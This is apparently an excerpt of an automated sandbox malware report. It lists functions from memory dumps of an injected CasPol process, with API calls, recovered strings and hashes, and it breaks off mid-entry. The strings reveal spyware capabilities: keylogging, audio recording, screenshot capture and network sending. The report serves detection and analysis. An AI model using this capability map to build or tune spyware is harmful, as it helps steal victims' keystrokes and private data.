                                                                                                • Instruction Fuzzy Hash: 2501F2B26093163EF61016796CC1F27671CEF417B8BB1032BB626612D2EEA88C46606D
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.4098661182.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000477000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 112e7316d96929b625426bf143e83baabee3255260599eba4999be5de9cde10c
                                                                                                • Instruction ID: 7fe3e8edc5bbc175eb6928fc2517c3e9b6b95ea9c4057c88a91cd5d3c4beb3ed
                                                                                                • Opcode Fuzzy Hash: 112e7316d96929b625426bf143e83baabee3255260599eba4999be5de9cde10c
                                                                                                • Instruction Fuzzy Hash: F201F9B22096167EB61016796DC4D27676DEF813B83F1033BF421612D1EEA8CC44A179
                                                                                                APIs
                                                                                                • ___BuildCatchObject.LIBVCRUNTIME ref: 0043831F
                                                                                                  • Part of subcall function 0043826C: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 0043829B
                                                                                                  • Part of subcall function 0043826C: ___AdjustPointer.LIBCMT ref: 004382B6
                                                                                                • _UnwindNestedFrames.LIBCMT ref: 00438334
                                                                                                • __FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 00438345
                                                                                                • CallCatchBlock.LIBVCRUNTIME ref: 0043836D
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.4098661182.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000477000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
                                                                                                • String ID:
                                                                                                • API String ID: 737400349-0
                                                                                                • Opcode ID: c8370f5f766c88f9b882548d03e746073a9763e8d7037f7b78bb80a5d64990c6
                                                                                                • Instruction ID: 0bcd00d322a0ad7a372b2cc4a74953bc209b0d499cbe7a3061e5fba3b10c2df3
                                                                                                • Opcode Fuzzy Hash: c8370f5f766c88f9b882548d03e746073a9763e8d7037f7b78bb80a5d64990c6
                                                                                                • Instruction Fuzzy Hash: 3E014072100248BBDF126E96CC41DEF7B69EF4C758F04501DFE4866221D73AE861DBA4
                                                                                                APIs
                                                                                                • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,10001D66,00000000,00000000,?,10005C88,10001D66,00000000,00000000,00000000,?,10005E85,00000006,FlsSetValue), ref: 10005D13
                                                                                                • GetLastError.KERNEL32(?,10005C88,10001D66,00000000,00000000,00000000,?,10005E85,00000006,FlsSetValue,1000E190,FlsSetValue,00000000,00000364,?,10005BC8), ref: 10005D1F
                                                                                                • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,10005C88,10001D66,00000000,00000000,00000000,?,10005E85,00000006,FlsSetValue,1000E190,FlsSetValue,00000000), ref: 10005D2D
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.4108479926.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                • Associated: 0000000C.00000002.4108117762.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.4108479926.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_10000000_CasPol.jbxd
                                                                                                Similarity
                                                                                                • API ID: LibraryLoad$ErrorLast
                                                                                                • String ID:
                                                                                                • API String ID: 3177248105-0
                                                                                                • Opcode ID: 803c5c09655bb12e7a00387565e20d3af286ada8f732c439529cecb726329beb
                                                                                                • Instruction ID: ab8c2af688280ff547417c348c7c3430721907d0b6a0cc88e9d35c15e8af339b
                                                                                                • Opcode Fuzzy Hash: 803c5c09655bb12e7a00387565e20d3af286ada8f732c439529cecb726329beb
                                                                                                • Instruction Fuzzy Hash: 59018436615732ABE7319B689C8CB4B7798EF056E2B214623F909D7158D731D801CAE0
                                                                                                APIs
                                                                                                • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000000,00000000,00000000,?,004473C7,00000000,00000000,00000000,00000000,?,004476F3,00000006,FlsSetValue), ref: 00447452
                                                                                                • GetLastError.KERNEL32(?,004473C7,00000000,00000000,00000000,00000000,?,004476F3,00000006,FlsSetValue,0045E328,FlsSetValue,00000000,00000364,?,004471A1), ref: 0044745E
                                                                                                • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,004473C7,00000000,00000000,00000000,00000000,?,004476F3,00000006,FlsSetValue,0045E328,FlsSetValue,00000000), ref: 0044746C
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.4098661182.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000477000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: LibraryLoad$ErrorLast
                                                                                                • String ID:
                                                                                                • API String ID: 3177248105-0
                                                                                                • Opcode ID: bca6965db1f65f3d9859255c05e5b0128703451981dee5a4eba808798ce175cf
                                                                                                • Instruction ID: 55721a836d87515a1eea2a56d4c7bce34062b93f94d6470a2cb527c4f3a692dc
                                                                                                • Opcode Fuzzy Hash: bca6965db1f65f3d9859255c05e5b0128703451981dee5a4eba808798ce175cf
                                                                                                • Instruction Fuzzy Hash: 6D01FC326497366BD7314F789C44A777FD8AF047617114535F906E3241DF28D802C6E8
                                                                                                APIs
                                                                                                • GetSystemMetrics.USER32(0000004C), ref: 0041870F
                                                                                                • GetSystemMetrics.USER32(0000004D), ref: 00418715
                                                                                                • GetSystemMetrics.USER32(0000004E), ref: 0041871B
                                                                                                • GetSystemMetrics.USER32(0000004F), ref: 00418721
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.4098661182.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000477000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: MetricsSystem
                                                                                                • String ID:
                                                                                                • API String ID: 4116985748-0
                                                                                                • Opcode ID: 0409876626ed8831e64dc81abc3b09ac1b97839c455807a5cfaaf12ce600e90b
                                                                                                • Instruction ID: 0d34e4fe417a410293abd419840fb627d3fd172a5f9f2d4f3f0ee0adad43daa0
                                                                                                • Opcode Fuzzy Hash: 0409876626ed8831e64dc81abc3b09ac1b97839c455807a5cfaaf12ce600e90b
                                                                                                • Instruction Fuzzy Hash: 26F0D672B043215BCB00AB754C4596EBB969FC03A4F25083FFA159B381EE78EC4687D9
                                                                                                APIs
                                                                                                • __startOneArgErrorHandling.LIBCMT ref: 0044217D
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.4098661182.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000477000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ErrorHandling__start
                                                                                                • String ID: pow
                                                                                                • API String ID: 3213639722-2276729525
                                                                                                • Opcode ID: 520362507bef941fab5cffea9abde62870a3d8c74bbf2bfcbae46fc27f337450
                                                                                                • Instruction ID: 9e1bbc3390eeabea57be79b34f62796538476165ffe421cdb5ba0d05f4dc7be1
                                                                                                • Opcode Fuzzy Hash: 520362507bef941fab5cffea9abde62870a3d8c74bbf2bfcbae46fc27f337450
                                                                                                • Instruction Fuzzy Hash: 7251AF61A0A20297F7557B15CE8137B2B90EB50741F684D6BF085423E9EB7CCC819F4E
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.4098661182.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000477000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: _memcmp
                                                                                                • String ID: <kG$<kG
                                                                                                • API String ID: 2931989736-383723866
                                                                                                • Opcode ID: 21e918851be83e46baa3e5e3c8b8b30cd909724b045746f3163941703dd33272
                                                                                                • Instruction ID: 841d78c923fca9e627808cf77cab3bf97fcfd39527adbe47470f5cf9fadca134
                                                                                                • Opcode Fuzzy Hash: 21e918851be83e46baa3e5e3c8b8b30cd909724b045746f3163941703dd33272
                                                                                                • Instruction Fuzzy Hash: 9F613471604B0A9ED710DF28D8806A6B7A5FF18304F440A3FEC5CCF656E3B8A955C7A9
                                                                                                APIs
                                                                                                • GetKeyboardLayoutNameA.USER32(?), ref: 00409601
                                                                                                  • Part of subcall function 004041F1: socket.WS2_32(00000002,00000001,00000006), ref: 00404212
                                                                                                  • Part of subcall function 0040428C: connect.WS2_32(?,01339ED0,00000010), ref: 004042A5
                                                                                                  • Part of subcall function 0041B8B5: CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,?,00000000,00409689,00474EE0,?,00474EE0,00000000,00474EE0,00000000), ref: 0041B8CA
                                                                                                  • Part of subcall function 00404468: send.WS2_32(00000270,00000000,00000000,00000000), ref: 004044FD
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.4098661182.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000477000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CreateFileKeyboardLayoutNameconnectsendsocket
                                                                                                • String ID: pQG$NG
                                                                                                • API String ID: 2334542088-921107917
                                                                                                • Opcode ID: 2f0036835594eed4ce93083ddce3bcc81bd0d7dcd3132cbe203772b69d30e3f0
                                                                                                • Instruction ID: 713adcd63a50277e86c853b9c7bd1a900ae8bd87492a3ad9f31fb308660c5d8e
                                                                                                • Opcode Fuzzy Hash: 2f0036835594eed4ce93083ddce3bcc81bd0d7dcd3132cbe203772b69d30e3f0
                                                                                                • Instruction Fuzzy Hash: BB5141321082405AC365F775D8A2AEF73E5AFD4308F50483FF84A671E2EE789949C69D
                                                                                                APIs
                                                                                                • GetCPInfo.KERNEL32(?,?,00000005,?,00000000), ref: 0044DD69
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.4098661182.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000477000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Info
                                                                                                • String ID: $vD
                                                                                                • API String ID: 1807457897-3636070802
                                                                                                • Opcode ID: af2dbb740455362532db4c6e27cef1bba8ecc5757f530743f693fef6f10ca257
                                                                                                • Instruction ID: 6a53932102cf2f29093c464eb4c67803ff3648b28b3ba8b7d074bec3f8911faa
                                                                                                • Opcode Fuzzy Hash: af2dbb740455362532db4c6e27cef1bba8ecc5757f530743f693fef6f10ca257
                                                                                                • Instruction Fuzzy Hash: D0415DB0D047489BEF218E24CC84AF6BBF9DF55708F2404EEE58A87142D239AD45DF65
                                                                                                APIs
                                                                                                • SHCreateMemStream.SHLWAPI(00000000,00000000,?,?,?,00000000), ref: 00417DFE
                                                                                                  • Part of subcall function 00417988: GdipLoadImageFromStream.GDIPLUS(?,?,?,00417E11,00000000,?,?,?,?,00000000), ref: 0041799C
                                                                                                • SHCreateMemStream.SHLWAPI(00000000), ref: 00417E4B
                                                                                                  • Part of subcall function 004179FB: GdipSaveImageToStream.GDIPLUS(?,?,?,?,00000000,00417E67,00000000,?,?), ref: 00417A0D
                                                                                                  • Part of subcall function 004179AB: GdipDisposeImage.GDIPLUS(?,00417EC2), ref: 004179B4
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.4098661182.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000477000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Stream$GdipImage$Create$DisposeFromLoadSave
                                                                                                • String ID: image/jpeg
                                                                                                • API String ID: 1291196975-3785015651
                                                                                                • Opcode ID: e1bf99cfe177926dfb30438cad3e48319a95351c55285f46e9bc63fa7091f753
                                                                                                • Instruction ID: 8af81f403c9bc23e7458ee74b157d237c4b9220e470ad7f048828f44144df9d5
                                                                                                • Opcode Fuzzy Hash: e1bf99cfe177926dfb30438cad3e48319a95351c55285f46e9bc63fa7091f753
                                                                                                • Instruction Fuzzy Hash: 23313C71518204AFC301EF65C884DAFB7E9EF8A704F000A6EF98597251DB79D9098BA6
                                                                                                APIs
                                                                                                • GetACP.KERNEL32(?,20001004,?,00000002), ref: 00450BC9
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.4098661182.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000477000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: ACP$OCP
                                                                                                • API String ID: 0-711371036
                                                                                                • Opcode ID: 6fd782f53c9633299fe98566c4ec68ed2bffd726811d49864d22e4fe4dac6dcd
                                                                                                • Instruction ID: d29bb87f3b47b124c8bd6c760bb86eb4cd4ec0f84f402c6b2e0ab732353f73f5
                                                                                                • Opcode Fuzzy Hash: 6fd782f53c9633299fe98566c4ec68ed2bffd726811d49864d22e4fe4dac6dcd
                                                                                                • Instruction Fuzzy Hash: 4021F72AA00105A6E7308FD48C82B977396AB50B1BF564467ED09D7303F73AFD09C358
                                                                                                APIs
                                                                                                • SHCreateMemStream.SHLWAPI(00000000,00000000,?,?,?,00000000), ref: 00417EEA
                                                                                                  • Part of subcall function 00417988: GdipLoadImageFromStream.GDIPLUS(?,?,?,00417E11,00000000,?,?,?,?,00000000), ref: 0041799C
                                                                                                • SHCreateMemStream.SHLWAPI(00000000,00000000,00000000,?,?,?,?,00000000), ref: 00417F0F
                                                                                                  • Part of subcall function 004179FB: GdipSaveImageToStream.GDIPLUS(?,?,?,?,00000000,00417E67,00000000,?,?), ref: 00417A0D
                                                                                                  • Part of subcall function 004179AB: GdipDisposeImage.GDIPLUS(?,00417EC2), ref: 004179B4
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.4098661182.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000477000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Stream$GdipImage$Create$DisposeFromLoadSave
                                                                                                • String ID: image/png
                                                                                                • API String ID: 1291196975-2966254431
                                                                                                • Opcode ID: 053f6287f7d965cb7f0bac2638c547cbf4955c36911a47581fa7b8d062986c86
                                                                                                • Instruction ID: ee77ca1c213fe0bce41e511bbcee913114c194eb695e7cc9890245c9a4d1a3c2
                                                                                                • Opcode Fuzzy Hash: 053f6287f7d965cb7f0bac2638c547cbf4955c36911a47581fa7b8d062986c86
                                                                                                • Instruction Fuzzy Hash: B9219F71204210AFC301AB61CC88DBFBBBDEFCA714B00052EF94693261DB389945CBA6
                                                                                                APIs
                                                                                                • GetLocalTime.KERNEL32(?,00474EE0,004755B0,?,?,?,?,?,?,?,00414F0F,?,00000001,0000004C,00000000), ref: 004049F1
                                                                                                  • Part of subcall function 0041A891: GetLocalTime.KERNEL32(00000000), ref: 0041A8AB
                                                                                                • GetLocalTime.KERNEL32(?,00474EE0,004755B0,?,?,?,?,?,?,?,00414F0F,?,00000001,0000004C,00000000), ref: 00404A4E
                                                                                                Strings
                                                                                                • KeepAlive | Enabled | Timeout: , xrefs: 004049E5
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.4098661182.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000477000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: LocalTime
                                                                                                • String ID: KeepAlive | Enabled | Timeout:
                                                                                                • API String ID: 481472006-1507639952
                                                                                                • Opcode ID: c6cf9ca78d787a4a59664c544c7b53d40829ad7c2b2d6c68100e7e6bbef70b34
                                                                                                • Instruction ID: 07f09c1926c096f578aeb4a964dedba27d52497869334d5e310e707c12b0f234
                                                                                                • Opcode Fuzzy Hash: c6cf9ca78d787a4a59664c544c7b53d40829ad7c2b2d6c68100e7e6bbef70b34
                                                                                                • Instruction Fuzzy Hash: 932131B1A042806BD600F77A980635B7B9497C4314F84043FE90C562E2EEBD59898BAF
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.4108479926.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                • Associated: 0000000C.00000002.4108117762.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.4108479926.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_10000000_CasPol.jbxd
                                                                                                Similarity
                                                                                                • API ID: _strlen
                                                                                                • String ID: : $Se.
                                                                                                • API String ID: 4218353326-4089948878
                                                                                                • Opcode ID: a70abbbd33418fa47f4ed48ac4096c545584c77cf093be3414735b4e2c88b945
                                                                                                • Instruction ID: 66f447a9efa091531784e06c0e565222335d100d85517175c1dac28435e0d9bb
                                                                                                • Opcode Fuzzy Hash: a70abbbd33418fa47f4ed48ac4096c545584c77cf093be3414735b4e2c88b945
                                                                                                • Instruction Fuzzy Hash: 2F11E7B5904249AEDB11DFA8D841BDEFBFCEF09244F104056E545E7252E6706B02C765
                                                                                                APIs
                                                                                                • GetLocalTime.KERNEL32(00000000), ref: 0041A8AB
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.4098661182.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000477000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: LocalTime
                                                                                                • String ID: | $%02i:%02i:%02i:%03i
                                                                                                • API String ID: 481472006-2430845779
                                                                                                • Opcode ID: 6dbe95c7b5757e9ce58fc17bd2da6423a517e2dc83338a49765ee97605ee0292
                                                                                                • Instruction ID: bea5c42f2d95e84a76b62dfc34e9438b8882b4e2d456746f57979f9b7964cbe7
                                                                                                • Opcode Fuzzy Hash: 6dbe95c7b5757e9ce58fc17bd2da6423a517e2dc83338a49765ee97605ee0292
                                                                                                • Instruction Fuzzy Hash: 0F114C725082405BC704EBA5D8969BF77E8AB94708F10093FF885A31E1EF38DA44C69E
                                                                                                APIs
                                                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 10002903
                                                                                                  • Part of subcall function 100035D2: RaiseException.KERNEL32(?,?,?,10002925,00000000,00000000,00000000,?,?,?,?,?,10002925,?,100121B8), ref: 10003632
                                                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 10002920
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.4108479926.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                • Associated: 0000000C.00000002.4108117762.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.4108479926.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_10000000_CasPol.jbxd
                                                                                                Similarity
                                                                                                • API ID: Exception@8Throw$ExceptionRaise
                                                                                                • String ID: Unknown exception
                                                                                                • API String ID: 3476068407-410509341
                                                                                                • Opcode ID: 00f05d2547b3034e4c7bbe2eae49a616f435d37e9c126e5e725cfb9fdfb6d2bb
                                                                                                • Instruction ID: 696891806b75a506f07e96a947ab79166ff1ea0d2f17bc9dac180a151cc952bd
                                                                                                • Opcode Fuzzy Hash: 00f05d2547b3034e4c7bbe2eae49a616f435d37e9c126e5e725cfb9fdfb6d2bb
                                                                                                • Instruction Fuzzy Hash: 2BF0A47890420D77AB04E6E5EC4599D77ACDB006D0F508161FD1496499EF31FA658690
                                                                                                APIs
                                                                                                  • Part of subcall function 0040A876: GetLocalTime.KERNEL32(?,?,00000000), ref: 0040A884
                                                                                                  • Part of subcall function 0040A876: wsprintfW.USER32 ref: 0040A905
                                                                                                  • Part of subcall function 0041A891: GetLocalTime.KERNEL32(00000000), ref: 0041A8AB
                                                                                                • CloseHandle.KERNEL32(?), ref: 0040A7CA
                                                                                                • UnhookWindowsHookEx.USER32 ref: 0040A7DD
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.4098661182.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000477000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: LocalTime$CloseHandleHookUnhookWindowswsprintf
                                                                                                • String ID: Online Keylogger Stopped
                                                                                                • API String ID: 1623830855-1496645233
                                                                                                • Opcode ID: e9030a107b25a9f2d0627fc4ad3c4338242d846ae4ce312a87aac4c0b11e5e53
                                                                                                • Instruction ID: da65c2120251a34d34924486d515db36f90714a8cba0a7d82e96ebed52376b78
                                                                                                • Opcode Fuzzy Hash: e9030a107b25a9f2d0627fc4ad3c4338242d846ae4ce312a87aac4c0b11e5e53
                                                                                                • Instruction Fuzzy Hash: 5901F131A043019BCB25BB35C80B7AEBBB19B45314F40406EE441225D2EB7999A6C3DF
                                                                                                APIs
                                                                                                • waveInPrepareHeader.WINMM(013264D0,00000020,?,?,00000000,00476B98,00474EE0,?,00000000,00401913), ref: 00401747
                                                                                                • waveInAddBuffer.WINMM(013264D0,00000020,?,00000000,00401913), ref: 0040175D
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.4098661182.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000477000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: wave$BufferHeaderPrepare
                                                                                                • String ID: XMG
                                                                                                • API String ID: 2315374483-813777761
                                                                                                • Opcode ID: ddcf6375f784c1628b927c4ebd910bbcf649a7619fcf77736d7f3a05f195dab6
                                                                                                • Instruction ID: 26799fbdff8c3ec01ad48014b311b0d3f370155dffc0330205344997a7b0d52a
                                                                                                • Opcode Fuzzy Hash: ddcf6375f784c1628b927c4ebd910bbcf649a7619fcf77736d7f3a05f195dab6
                                                                                                • Instruction Fuzzy Hash: 6501AD71300300AFD7209F39ED45A69BBB5EF89315B00413EB808E33A2EB74AC50CB98
                                                                                                APIs
                                                                                                • IsValidLocale.KERNEL32(00000000,z?D,00000000,00000001,?,?,00443F7A,?,?,?,?,00000004), ref: 004479EC
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.4098661182.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000477000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: LocaleValid
                                                                                                • String ID: IsValidLocaleName$z?D
                                                                                                • API String ID: 1901932003-2490211753
                                                                                                • Opcode ID: 030ca6b5b062e3e6eb463140e6e5805cf12db518d0019a9c378278714199a4d0
                                                                                                • Instruction ID: 892bc6e93789200f6c95030ba230210178196c8f1f686432b442ac7872abfc60
                                                                                                • Opcode Fuzzy Hash: 030ca6b5b062e3e6eb463140e6e5805cf12db518d0019a9c378278714199a4d0
                                                                                                • Instruction Fuzzy Hash: 06F0E930645218B7DB186F258C06F5E7B95CB05716F50807BFC047A293DE794E0295DD
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.4098661182.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000477000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: H_prolog
                                                                                                • String ID: XMG$XMG
                                                                                                • API String ID: 3519838083-886261599
                                                                                                • Opcode ID: 94d942c2b9cd7cd452367b65107360caec8e392a141153fe325b9bee2a1bda9b
                                                                                                • Instruction ID: 0a877421dfc5135a28098138b17ad9f721677e320a6d1c8a6a2adbe775497da7
